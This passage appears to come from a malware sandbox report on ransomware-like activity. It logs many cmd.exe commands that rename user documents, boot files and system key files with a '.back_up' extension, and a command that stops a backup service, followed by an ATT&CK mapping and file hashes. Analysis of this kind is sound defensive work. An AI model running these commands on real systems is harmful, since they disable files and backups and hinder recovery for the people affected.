cmd.exe /c move """C:\\Program Files\7-Zip\Lang\id.txt""" """C:\\Program Files\7-Zip\Lang\id.txt.back_up"""
4⤵
PID:4288

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Searches\desktop.ini""" """C:\\Users\Admin\Searches\desktop.ini.back_up"""
4⤵
PID:5044

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\sk-SK\bootmgr.exe.mui""" """C:\\Boot\sk-SK\bootmgr.exe.mui.back_up"""
4⤵
PID:1352

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\pt-BR\memtest.exe.mui""" """C:\\Boot\pt-BR\memtest.exe.mui.back_up"""
4⤵
PID:4916

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\SY______.PFB""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\SY______.PFB.back_up"""
4⤵
PID:4760

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Pictures\AddShow.jpeg""" """C:\\Users\Admin\Pictures\AddShow.jpeg.back_up"""
4⤵
PID:4428

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\sl-SI\bootmgr.exe.mui""" """C:\\Boot\sl-SI\bootmgr.exe.mui.back_up"""
4⤵
PID:4560

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\qps-ploc\bootmgr.exe.mui""" """C:\\Boot\qps-ploc\bootmgr.exe.mui.back_up"""
4⤵
PID:4664

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Documents\Are.docx""" """C:\\Users\Admin\Documents\Are.docx.back_up"""
4⤵
PID:1364

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\qps-ploc\memtest.exe.mui""" """C:\\Boot\qps-ploc\memtest.exe.mui.back_up"""
4⤵
PID:4940

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\sv-SE\bootmgr.exe.mui""" """C:\\Boot\sv-SE\bootmgr.exe.mui.back_up"""
4⤵
PID:4732

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Music\ImportSwitch.3gpp""" """C:\\Users\Admin\Music\ImportSwitch.3gpp.back_up"""
4⤵
PID:5036

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\sv-SE\memtest.exe.mui""" """C:\\Boot\sv-SE\memtest.exe.mui.back_up"""
4⤵
PID:376

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml""" """C:\\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml.back_up"""
4⤵
PID:1708

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Common Files\System\msadc\adcvbs.inc""" """C:\\Program Files (x86)\Common Files\System\msadc\adcvbs.inc.back_up"""
4⤵
PID:4740

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\zh-TW\bootmgr.exe.mui""" """C:\\Boot\zh-TW\bootmgr.exe.mui.back_up"""
4⤵
PID:4540

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Common Files\System\msadc\adcjavas.inc""" """C:\\Program Files (x86)\Common Files\System\msadc\adcjavas.inc.back_up"""
4⤵
PID:2652

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Desktop\AssertSwitch.xlt""" """C:\\Users\Admin\Desktop\AssertSwitch.xlt.back_up"""
4⤵
PID:4256

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Links\desktop.ini""" """C:\\Users\Admin\Links\desktop.ini.back_up"""
4⤵
PID:5012

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm""" """C:\\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm.back_up"""
4⤵
PID:4920

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\User Account Pictures\guest.bmp""" """C:\\ProgramData\Microsoft\User Account Pictures\guest.bmp.back_up"""
4⤵
PID:4344

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Desktop\ClearSkip.vsx""" """C:\\Users\Admin\Desktop\ClearSkip.vsx.back_up"""
4⤵
PID:5104

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Links\Desktop.lnk""" """C:\\Users\Admin\Links\Desktop.lnk.back_up"""
4⤵
PID:4192

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\ru-RU\bootmgr.exe.mui""" """C:\\Boot\ru-RU\bootmgr.exe.mui.back_up"""
4⤵
PID:360

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\AppData\Roaming\ApproveDeny.lnk""" """C:\\Users\Admin\AppData\Roaming\ApproveDeny.lnk.back_up"""
4⤵
PID:1684

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\zh-CN\bootmgr.exe.mui""" """C:\\Boot\zh-CN\bootmgr.exe.mui.back_up"""
4⤵
PID:1520

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Saved Games\desktop.ini""" """C:\\Users\Admin\Saved Games\desktop.ini.back_up"""
4⤵
PID:4372

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\lt-LT\bootmgr.exe.mui""" """C:\\Boot\lt-LT\bootmgr.exe.mui.back_up"""
4⤵
PID:4560

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\ru-RU\memtest.exe.mui""" """C:\\Boot\ru-RU\memtest.exe.mui.back_up"""
4⤵
PID:4444

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Videos\desktop.ini""" """C:\\Users\Admin\Videos\desktop.ini.back_up"""
4⤵
PID:4640

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\Crypto\SystemKeys\12780705e4414c0ef1598a1e2c479c2e_cc51e87d-bda7-4ef7-80cf-c431fec6b805""" """C:\\ProgramData\Microsoft\Crypto\SystemKeys\12780705e4414c0ef1598a1e2c479c2e_cc51e87d-bda7-4ef7-80cf-c431fec6b805.back_up"""
4⤵
PID:1236

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Documents\AssertSet.ppsx""" """C:\\Users\Admin\Documents\AssertSet.ppsx.back_up"""
4⤵
PID:4660

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Pictures\BlockImport.tiff""" """C:\\Users\Admin\Pictures\BlockImport.tiff.back_up"""
4⤵
- Modifies extensions of user files
PID:2308

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat""" """C:\\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat.back_up"""
4⤵
PID:5056

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets""" """C:\\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets.back_up"""
4⤵
PID:5112

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Music\InitializeWatch.xps""" """C:\\Users\Admin\Music\InitializeWatch.xps.back_up"""
4⤵
PID:4200

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Documents\BlockRestart.mpp""" """C:\\Users\Admin\Documents\BlockRestart.mpp.back_up"""
4⤵
PID:5012

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\uk-UA\bootmgr.exe.mui""" """C:\\Boot\uk-UA\bootmgr.exe.mui.back_up"""
4⤵
PID:4344

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\nl-NL\memtest.exe.mui""" """C:\\Boot\nl-NL\memtest.exe.mui.back_up"""
4⤵
PID:2652

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\pl-PL\bootmgr.exe.mui""" """C:\\Boot\pl-PL\bootmgr.exe.mui.back_up"""
4⤵
PID:4540

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Favorites\desktop.ini""" """C:\\Users\Admin\Favorites\desktop.ini.back_up"""
4⤵
PID:2624

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml""" """C:\\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml.back_up"""
4⤵
PID:4364

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""" """C:\\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui.back_up"""
4⤵
PID:4968

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\zh-TW\memtest.exe.mui""" """C:\\Boot\zh-TW\memtest.exe.mui.back_up"""
4⤵
PID:2788

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Searches\Everywhere.search-ms""" """C:\\Users\Admin\Searches\Everywhere.search-ms.back_up"""
4⤵
PID:3944

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Desktop\CloseConvertTo.midi""" """C:\\Users\Admin\Desktop\CloseConvertTo.midi.back_up"""
4⤵
PID:4472

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\AppData\Roaming\ApproveWatch.htm""" """C:\\Users\Admin\AppData\Roaming\ApproveWatch.htm.back_up"""
4⤵
PID:4492

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Common Files\System\en-US\wab32res.dll.mui""" """C:\\Program Files (x86)\Common Files\System\en-US\wab32res.dll.mui.back_up"""
4⤵
PID:4340

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Links\Downloads.lnk""" """C:\\Users\Admin\Links\Downloads.lnk.back_up"""
4⤵
PID:4328

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\zh-CN\memtest.exe.mui""" """C:\\Boot\zh-CN\memtest.exe.mui.back_up"""
4⤵
PID:4804

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\io.txt""" """C:\\Program Files\7-Zip\Lang\io.txt.back_up"""
4⤵
PID:3576

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\cef_100_percent.pak""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\cef_100_percent.pak.back_up"""
4⤵
PID:4268

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Bears.htm""" """C:\\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Bears.htm.back_up"""
4⤵
PID:2308

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\AppData\Roaming\DismountWrite.rtf""" """C:\\Users\Admin\AppData\Roaming\DismountWrite.rtf.back_up"""
4⤵
PID:4640

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\sr-Latn-RS\bootmgr.exe.mui""" """C:\\Boot\sr-Latn-RS\bootmgr.exe.mui.back_up"""
4⤵
PID:2168

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\ja-JP\bootmgr.exe.mui""" """C:\\Boot\ja-JP\bootmgr.exe.mui.back_up"""
4⤵
PID:4964

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\ZX______.PFB""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\ZX______.PFB.back_up"""
4⤵
PID:4300

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\ja-JP\memtest.exe.mui""" """C:\\Boot\ja-JP\memtest.exe.mui.back_up"""
4⤵
PID:3972

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\ZY______.PFB""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\ZY______.PFB.back_up"""
4⤵
PID:4820

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\MF\Active.GRL""" """C:\\ProgramData\Microsoft\MF\Active.GRL.back_up"""
4⤵
PID:3516

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Downloads\BlockPing.cmd""" """C:\\Users\Admin\Downloads\BlockPing.cmd.back_up"""
4⤵
PID:4184

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\User Account Pictures\guest.png""" """C:\\ProgramData\Microsoft\User Account Pictures\guest.png.back_up"""
4⤵
PID:4408

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Internet Explorer\SIGNUP\install.ins""" """C:\\Program Files (x86)\Internet Explorer\SIGNUP\install.ins.back_up"""
4⤵
PID:5100

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\cef.pak""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\cef.pak.back_up"""
4⤵
PID:2652

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets""" """C:\\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets.back_up"""
4⤵
PID:4660

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Searches\Indexed Locations.search-ms""" """C:\\Users\Admin\Searches\Indexed Locations.search-ms.back_up"""
4⤵
PID:420

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\Diagnosis\VortexSchemaRequests.dat""" """C:\\ProgramData\Microsoft\Diagnosis\VortexSchemaRequests.dat.back_up"""
4⤵
PID:4800

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\is.txt""" """C:\\Program Files\7-Zip\Lang\is.txt.back_up"""
4⤵
PID:1624

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Desktop\CompleteWrite.wma""" """C:\\Users\Admin\Desktop\CompleteWrite.wma.back_up"""
4⤵
PID:1168

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Music\MoveGet.ods""" """C:\\Users\Admin\Music\MoveGet.ods.back_up"""
4⤵
PID:1916

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\AppData\Roaming\EnterHide.mpeg2""" """C:\\Users\Admin\AppData\Roaming\EnterHide.mpeg2.back_up"""
4⤵
PID:2724

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Documents\ConfirmJoin.mhtml""" """C:\\Users\Admin\Documents\ConfirmJoin.mhtml.back_up"""
4⤵
PID:4304

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Windows NT\TableTextService\TableTextServiceAmharic.txt""" """C:\\Program Files (x86)\Windows NT\TableTextService\TableTextServiceAmharic.txt.back_up"""
4⤵
PID:4816

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Windows NT\TableTextService\TableTextServiceArray.txt""" """C:\\Program Files (x86)\Windows NT\TableTextService\TableTextServiceArray.txt.back_up"""
4⤵
PID:4224

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\cryptocme.sig""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\cryptocme.sig.back_up"""
4⤵
PID:4820

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Bears.jpg""" """C:\\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Bears.jpg.back_up"""
4⤵
PID:1036

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Pictures\ClearCheckpoint.svg""" """C:\\Users\Admin\Pictures\ClearCheckpoint.svg.back_up"""
4⤵
PID:5072

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Documents\ConnectRevoke.xltx""" """C:\\Users\Admin\Documents\ConnectRevoke.xltx.back_up"""
4⤵
PID:4216

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml""" """C:\\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml.back_up"""
4⤵
PID:1044

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\ro-RO\bootmgr.exe.mui""" """C:\\Boot\ro-RO\bootmgr.exe.mui.back_up"""
4⤵
PID:4184

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\pl-PL\memtest.exe.mui""" """C:\\Boot\pl-PL\memtest.exe.mui.back_up"""
4⤵
PID:4500

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm""" """C:\\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm.back_up"""
4⤵
PID:2020

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\Resources\en-US\bootres.dll.mui""" """C:\\Boot\Resources\en-US\bootres.dll.mui.back_up"""
4⤵
PID:4124

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Downloads\CompleteCompare.temp""" """C:\\Users\Admin\Downloads\CompleteCompare.temp.back_up"""
4⤵
PID:4376

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\User Account Pictures\user-192.png""" """C:\\ProgramData\Microsoft\User Account Pictures\user-192.png.back_up"""
4⤵
PID:4620

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\User Account Pictures\user-32.png""" """C:\\ProgramData\Microsoft\User Account Pictures\user-32.png.back_up"""
4⤵
PID:1060

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""" """C:\\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui.back_up"""
4⤵
PID:4492

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Common Files\System\msadc\en-US\msadcer.dll.mui""" """C:\\Program Files (x86)\Common Files\System\msadc\en-US\msadcer.dll.mui.back_up"""
4⤵
PID:5096

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""" """C:\\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets.back_up"""
4⤵
PID:1916

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Searches\winrt--{S-1-5-21-1594587808-2047097707-2163810515-1000}-.searchconnector-ms""" """C:\\Users\Admin\Searches\winrt--{S-1-5-21-1594587808-2047097707-2163810515-1000}-.searchconnector-ms.back_up"""
4⤵
PID:5056

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\cef_200_percent.pak""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\cef_200_percent.pak.back_up"""
4⤵
PID:3580

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Common Files\Microsoft Shared\VSTO\ActionsPane3.xsd""" """C:\\Program Files (x86)\Common Files\Microsoft Shared\VSTO\ActionsPane3.xsd.back_up"""
4⤵
PID:4616

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Desktop\desktop.ini""" """C:\\Users\Admin\Desktop\desktop.ini.back_up"""
4⤵
PID:2444

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\ja.txt""" """C:\\Program Files\7-Zip\Lang\ja.txt.back_up"""
4⤵
PID:5104

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\Microsoft Office\ThinAppXManifest.xml""" """C:\\Program Files\Microsoft Office\ThinAppXManifest.xml.back_up"""
4⤵
PID:4820

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\it.txt""" """C:\\Program Files\7-Zip\Lang\it.txt.back_up"""
4⤵
PID:1176

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1""" """C:\\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1.back_up"""
4⤵
PID:3828

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\AppData\Roaming\GetOut.wma""" """C:\\Users\Admin\AppData\Roaming\GetOut.wma.back_up"""
4⤵
PID:4344

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Windows NT\Accessories\en-US\wordpad.exe.mui""" """C:\\Program Files (x86)\Windows NT\Accessories\en-US\wordpad.exe.mui.back_up"""
4⤵
PID:4376

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Pictures\CompleteWatch.pcx""" """C:\\Users\Admin\Pictures\CompleteWatch.pcx.back_up"""
4⤵
PID:1060

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\AppData\Roaming\GroupSave.pdf""" """C:\\Users\Admin\AppData\Roaming\GroupSave.pdf.back_up"""
4⤵
PID:1040

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Windows NT\TableTextService\TableTextServiceDaYi.txt""" """C:\\Program Files (x86)\Windows NT\TableTextService\TableTextServiceDaYi.txt.back_up"""
4⤵
PID:3236

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Windows Media Player\mpvis.DLL""" """C:\\Program Files (x86)\Windows Media Player\mpvis.DLL.back_up"""
4⤵
PID:1504

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Common Files\Microsoft Shared\VSTA\VSTOFiles.cat""" """C:\\Program Files (x86)\Common Files\Microsoft Shared\VSTA\VSTOFiles.cat.back_up"""
4⤵
PID:2940

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\Java\jdk1.8.0_66\COPYRIGHT""" """C:\\Program Files\Java\jdk1.8.0_66\COPYRIGHT.back_up"""
4⤵
PID:3980

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Pictures\ConfirmExport.gif""" """C:\\Users\Admin\Pictures\ConfirmExport.gif.back_up"""
4⤵
PID:4568

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.PERFTRACKESCALATIONS.xml""" """C:\\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.PERFTRACKESCALATIONS.xml.back_up"""
4⤵
PID:2444

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\Windows Defender\AmMonitoringInstall.mof""" """C:\\Program Files\Windows Defender\AmMonitoringInstall.mof.back_up"""
4⤵
PID:4680

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee100.tlb""" """C:\\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee100.tlb.back_up"""
4⤵
PID:5036

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\ka.txt""" """C:\\Program Files\7-Zip\Lang\ka.txt.back_up"""
4⤵
PID:4524

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.DIAGNOSTICS.xml""" """C:\\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.DIAGNOSTICS.xml.back_up"""
4⤵
PID:4144

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Public\desktop.ini""" """C:\\Users\Public\desktop.ini.back_up"""
4⤵
PID:1392

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Music\ReadUnpublish.rle""" """C:\\Users\Admin\Music\ReadUnpublish.rle.back_up"""
4⤵
PID:4124

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Common Files\System\msadc\en-US\msdaremr.dll.mui""" """C:\\Program Files (x86)\Common Files\System\msadc\en-US\msdaremr.dll.mui.back_up"""
4⤵
PID:4140

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\msinfo32.exe.mui""" """C:\\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\msinfo32.exe.mui.back_up"""
4⤵
PID:4804

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Downloads\ConvertToDisconnect.rar""" """C:\\Users\Admin\Downloads\ConvertToDisconnect.rar.back_up"""
4⤵
PID:4644

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\AppCenter_R.aapp""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\AppCenter_R.aapp.back_up"""
4⤵
PID:4540

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\MF\Pending.GRL""" """C:\\ProgramData\Microsoft\MF\Pending.GRL.back_up"""
4⤵
PID:1792

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\Windows Live\WLive48x48.png""" """C:\\ProgramData\Microsoft\Windows Live\WLive48x48.png.back_up"""
4⤵
PID:2528

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Windows NT\TableTextService\TableTextServiceTigrinya.txt""" """C:\\Program Files (x86)\Windows NT\TableTextService\TableTextServiceTigrinya.txt.back_up"""
4⤵
PID:3980

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Desktop\EditMeasure.jpg""" """C:\\Users\Admin\Desktop\EditMeasure.jpg.back_up"""
4⤵
PID:4268

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1680

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:1352

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\Manifest.xml
MD5
af5e8111fb37204944b84c304c266667

SHA1
dd777c010e7308f94111f3ac8a4ad2c793726726

SHA256
049136f8780eb333eaec164d625de1930bd42a8599272b0af141a8b78d2ec7f0

SHA512
43f5f287f7f5cad73944c12b108c73af18850af7a767daf03523c160c996a6829c4784ca26cab1f6621417fe787ad7511102b991e6e59068682b7e2ba6584e12

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23882\VCRUNTIME140.dll
MD5
4a365ffdbde27954e768358f4a4ce82e

SHA1
a1b31102eee1d2a4ed1290da2038b7b9f6a104a3

SHA256
6a0850419432735a98e56857d5cfce97e9d58a947a9863ca6afadd1c7bcab27c

SHA512
54e4b6287c4d5a165509047262873085f50953af63ca0dcb7649c22aba5b439ab117a7e0d6e7f0a3e51a23e28a255ffd1ca1ddce4b2ea7f87bca1c9b0dbe2722

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23882\_bz2.pyd
MD5
5375043ef0829e9c4b54eb2e7687806b

SHA1
80839fab995c6a3e7695bc206f2bcacb425b5a8f

